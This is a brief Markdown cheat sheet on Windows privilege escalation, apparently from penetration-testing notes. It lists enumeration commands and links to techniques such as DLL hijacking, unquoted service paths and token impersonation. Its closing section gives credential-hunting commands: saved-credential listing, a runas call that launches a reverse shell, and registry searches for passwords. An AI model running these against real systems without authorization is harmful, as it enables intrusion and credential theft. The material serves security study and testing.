# Windows Privilege Escalation

## Links
* [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
* [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
* [JAWS](https://github.com/411Hall/JAWS)

## Account Types

* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__

## Enumeration

### Users & Groups
```sh
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta
```

### Files
* [powershell](../../../../enumeration/windows/powershell.md)

### System
```sh
hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
```
* Installed software
```sh
wmic product get name,version,vendor
```
* Services
```sh
wmic service list brief | findstr  "Running"
```

## Exploit

### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)

### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
*  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/potatoes.md)

### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`

### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

### Search for Credentials
```sh
cmdkey /list
```
* Use found credentials
```sh
runas /savecred /user:<user> reverse_shell.exe
```
* Keys containing passwords
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```